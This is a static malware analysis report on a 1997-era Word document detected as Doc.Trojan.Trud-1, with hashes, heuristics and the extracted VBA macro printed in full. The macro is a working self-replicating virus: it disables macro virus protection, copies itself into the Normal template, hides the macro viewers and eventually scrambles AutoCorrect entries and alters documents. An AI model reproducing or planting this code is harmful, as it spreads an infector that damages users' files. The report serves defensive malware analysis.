Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 998b9f83786405b9…

MALICIOUS

Office (OLE)

37.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4e8b922697fbd74c18e39ee8e51649ed SHA-1: f205319d5a8fda183d617e66ee1d7dd2e4356fd4 SHA-256: 998b9f83786405b9401edcdc3b22fdfda6e117aa8125624c2a3b497ea78810f2
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a Document_Open VBA macro that attempts to establish persistence. It copies its code to the Normal template and modifies it, likely to ensure execution when new documents are created or opened. The macro also attempts to obfuscate its actions by manipulating AutoCorrect entries. The ClamAV detection of 'Doc.Trojan.Trud-1' further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Trojan.Trud-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Trud-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 20,284 bytes but its declared streams total only 0 bytes — 20,284 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10440 bytes
SHA-256: dfbd057538c9fdaed18818feafe5f9165a9ea419004578c745022566d6c4e43a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo hometime
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
hohoho = 0
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 0 And ad > 0 Then GoTo hometime
If Dir("c:\winini.log", vbSystem) = "" And nt = 0 Then
    Set host = NormalTemplate.VBProject.VBComponents.Item(1)
    ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\winini.log"
    SetAttr "c:\winini.log", vbSystem
    host.codemodule.AddFromFile ("c:\winini.log")
    host.codemodule.replaceline 5, "Private Sub Document_Close()"
    host.codemodule.replaceline 75, "Sub ViewVBCode()"
    host.codemodule.replaceline 78, "Sub ToolsMacro()"
Else
    plop = ActiveDocument.Saved
    plop2 = True
    Set host = ActiveDocument.VBProject.VBComponents.Item(1)
    host.codemodule.AddFromFile ("c:\winini.log")
End If
For x = 1 To 4
    host.codemodule.deletelines 1
Next x
hohoho = hohoho + 1
NormalTemplate.VBProject.VBComponents.Item(1).codemodule.replaceline 6, "hohoho = " & hohoho
If hohoho = 69 Then
    AutoCorrect.ReplaceText = True
    For z = 1 To AutoCorrect.Entries.Count
        txt1 = AutoCorrect.Entries.Item(z).Name
        txt2 = AutoCorrect.Entries.Item(z).Value
        AutoCorrect.Entries.Item(z).Value = "xyz"
        AutoCorrect.Entries.Item(z).Name = txt2
        AutoCorrect.Entries.Item(z).Value = txt1
    Next z
End If
If hohoho >= 69 Then
    Application.Caption = "Microsoft Turd"
    For x = 0 To 250 Step 50
    For y = 0 To 250 Step 50
        ActiveDocument.Shapes.AddShape(msoShapeSmileyFace, x, y, 50, 50).Fill.ForeColor.RGB = RGB(x, y, 250 - x)
    Next y
    Next x
    Set bln = Assistant.NewBalloon
    With bln
        .Heading = "Isn't life just a bitch"
        .Text = "Choose an option."
        .Labels(1).Text = "Loose all your data."
        .Labels(2).Text = "Loose most of your data."
        .Labels(3).Text = "Loose just enough data to really fuck you off"
        .BalloonType = msoBalloonTypeButtons
        .Mode = msoModeModal
        .Show
    End With
    With ActiveDocument.Content
        .InsertParagraphBefore
        .InsertBefore "Don't Worry About a Thing !!!    I wouldn't fuck up your data !!!"
    End With
    With ActiveDocument.Paragraphs(1).Range.Font
        .ColorIndex = wdGreen
        .Size = 24
    End With
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If plop2 Then ActiveDocument.Saved = plop
hometime:
End Sub
Private Sub Junk1()
    MsgBox ("Essential DLL missing.  Please reinstall Microsoft Office.")
End Sub
Private Sub junk2()
    MsgBox ("Essential DLL missing.  Please reinstall Microsoft Office.")
End Sub

' Processing file: /opt/analyzer/scan_staging/3a7eb66630904ddf9a6a57efe251d33e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5299 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError hometime 
' Line #2:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #5:
' 	LitDI2 0x0000 
' 	St hohoho 
' Line #6:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	St ad 
' Line #7:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	St
... (truncated)
embedded_office_off000046c4.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x46C4 20284 bytes
SHA-256: e647edde0a1e336626530fe7f4d20980d0aa65c162394e0a4f4164a48ee97509

Open this report in the interactive analyzer, or submit your own file for analysis.